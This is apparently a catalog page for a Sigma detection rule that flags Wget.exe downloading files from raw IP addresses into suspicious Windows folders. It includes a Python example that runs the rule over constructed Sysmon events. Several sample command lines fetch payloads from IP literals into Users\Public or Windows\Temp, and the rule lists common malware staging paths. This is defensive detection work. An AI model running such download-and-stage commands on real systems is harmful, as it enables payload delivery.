Suspicious File Download From IP Via Wget.EXE - Paths
Detects potentially suspicious file downloads with Wget.exe that fetch directly from an IP address literal and write the output into a suspicious location
Event coverage
| Provider | Event ID | Title |
|---|---|---|
| Sysmon | 1 | Process creation |
Stages and Predicates
Stage 1: all of selection_img
or:
Image|endswith: '\wget.exe'
OriginalFileName: wget.exe
Stage 2: all of selection_ip
CommandLine|re: '://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
Stage 3: all of selection_http
CommandLine|contains: http
Stage 4: all of selection_flag
or:
CommandLine|contains: --output-document
CommandLine|re: '\s-O\s'
Stage 5: all of selection_paths
or:
CommandLine|contains|all: ':\Users\', '\Contacts\'
CommandLine|contains|all: ':\Users\', '\Favorites\'
CommandLine|contains|all: ':\Users\', '\Favourites\'
CommandLine|contains|all: ':\Users\', '\Pictures\'
CommandLine|contains: ':\PerfLogs\'
CommandLine|contains: ':\Temp\'
CommandLine|contains: ':\Users\Public\'
CommandLine|contains: ':\Windows\Help\'
CommandLine|contains: ':\Windows\Temp\'
CommandLine|contains: '\Temporary Internet'
Each contains|all entry requires both of its strings to appear in the command line (a download into a per-user Contacts, Favorites or Pictures folder); the remaining entries match on their own.
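The five stages above, written out as executable detection logic and run over a handful of constructed Sysmon Event ID 1 records. This is an added example, not part of the Sigma rule or of the catalog: the event records are made up, and the helper names (selection_img, selection_ip, selection_http, selection_flag, selection_paths, matches, failed_stage, run) are this example's own. String predicates are evaluated case-insensitively, as the Sigma specification defines contains, endswith and plain equality, while the two |re predicates are evaluated as case-sensitive regular expressions, so that -O (output document) is not confused with wget's -o (log file).

```python
import re
from typing import Callable, Dict, List

# Constructed Sysmon Event ID 1 (process creation) records; not real telemetry.
# Only the three fields the rule reads are included.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # wget from a bare IP, -O into C:\Users\Public -> should match
        "Image": r"C:\Tools\wget.exe",
        "OriginalFileName": "wget.exe",
        "CommandLine": r"wget.exe http://10.0.0.5/payload.bin -O C:\Users\Public\update.exe",
    },
    {   # renamed binary; OriginalFileName still says wget.exe -> should match
        "Image": r"C:\ProgramData\svchost.exe",
        "OriginalFileName": "wget.exe",
        "CommandLine": r"svchost.exe --output-document=C:\Windows\Temp\a.dll http://203.0.113.7/a.dll",
    },
    {   # per-user Pictures folder: needs both ':\Users\' and '\Pictures\' -> should match
        "Image": r"C:\Tools\wget.exe",
        "OriginalFileName": "wget.exe",
        "CommandLine": r"wget.exe -O C:\Users\bob\Pictures\x.exe http://198.51.100.4/x.exe",
    },
    {   # hostname rather than an IP literal -> selection_ip rejects it
        "Image": r"C:\Tools\wget.exe",
        "OriginalFileName": "wget.exe",
        "CommandLine": r"wget.exe https://example.com/file.zip -O C:\Users\Public\file.zip",
    },
    {   # IP download written to a path the rule does not list -> selection_paths rejects it
        "Image": r"C:\Tools\wget.exe",
        "OriginalFileName": "wget.exe",
        "CommandLine": r"wget.exe http://192.0.2.10/file.zip -O C:\Builds\file.zip",
    },
    {   # -P (directory prefix) instead of -O -> selection_flag rejects it
        "Image": r"C:\Tools\wget.exe",
        "OriginalFileName": "wget.exe",
        "CommandLine": r"wget.exe -P C:\Users\Public\dl http://192.0.2.10/file.zip",
    },
]

# The two |re predicates, verbatim from the rule (case-sensitive regex).
IP_URL_RE = re.compile(r"://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}")
SHORT_O_RE = re.compile(r"\s-O\s")

# selection_paths: the four ':\Users\' entries are paired with a subfolder, the rest stand alone.
USER_SUBDIRS = ["\\Contacts\\", "\\Favorites\\", "\\Favourites\\", "\\Pictures\\"]
OTHER_PATHS = [":\\PerfLogs\\", ":\\Temp\\", ":\\Users\\Public\\", ":\\Windows\\Help\\",
               ":\\Windows\\Temp\\", "\\Temporary Internet"]


def contains(value: str, needle: str) -> bool:
    """Sigma 'contains': case-insensitive substring test."""
    return needle.casefold() in value.casefold()


def selection_img(ev: Dict[str, str]) -> bool:
    return (ev.get("Image", "").casefold().endswith("\\wget.exe")
            or ev.get("OriginalFileName", "").casefold() == "wget.exe")


def selection_ip(ev: Dict[str, str]) -> bool:
    return IP_URL_RE.search(ev.get("CommandLine", "")) is not None


def selection_http(ev: Dict[str, str]) -> bool:
    return contains(ev.get("CommandLine", ""), "http")


def selection_flag(ev: Dict[str, str]) -> bool:
    cl = ev.get("CommandLine", "")
    return contains(cl, "--output-document") or SHORT_O_RE.search(cl) is not None


def selection_paths(ev: Dict[str, str]) -> bool:
    cl = ev.get("CommandLine", "")
    user_dir_hit = contains(cl, ":\\Users\\") and any(contains(cl, d) for d in USER_SUBDIRS)
    return user_dir_hit or any(contains(cl, p) for p in OTHER_PATHS)


# condition: all of selection_*
STAGES: List[Callable[[Dict[str, str]], bool]] = [
    selection_img, selection_ip, selection_http, selection_flag, selection_paths,
]


def matches(ev: Dict[str, str]) -> bool:
    return all(stage(ev) for stage in STAGES)


def failed_stage(ev: Dict[str, str]) -> str:
    """Name of the first predicate that rejects the event, or '' if every stage passes."""
    for stage in STAGES:
        if not stage(ev):
            return stage.__name__
    return ""


def run(events: List[Dict[str, str]]) -> List[int]:
    """Indexes of the events the rule fires on."""
    return [i for i, ev in enumerate(events) if matches(ev)]


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        verdict = "MATCH" if matches(ev) else "no match (" + failed_stage(ev) + ")"
        print(i, verdict, ev["CommandLine"])
```

The last three constructed records show where the rule's coverage stops, each by design of the predicates rather than by any defect: a download from a hostname never satisfies selection_ip, a write outside the listed folders never satisfies selection_paths, and a download steered with wget's -P directory prefix never satisfies selection_flag, because that stage looks only for --output-document or a whitespace-delimited -O. The \s-O\s regex also needs whitespace on both sides, so a -O that is the final token of the command line does not match it.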
Indicators
Each row is a field, the operator applied to it, and the values the rule matches against.
| Field | Kind | Values |
|---|---|---|
| CommandLine | match | 'http'; '--output-document'; ':\Users\' (paired with '\Contacts\', '\Favorites\', '\Favourites\' or '\Pictures\'); ':\PerfLogs\'; ':\Temp\'; ':\Users\Public\'; ':\Windows\Help\'; ':\Windows\Temp\'; '\Temporary Internet' |
| CommandLine | regex_match | '://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'; '\s-O\s' |
| Image | ends_with | '\wget.exe' |
| OriginalFileName | eq | 'wget.exe' |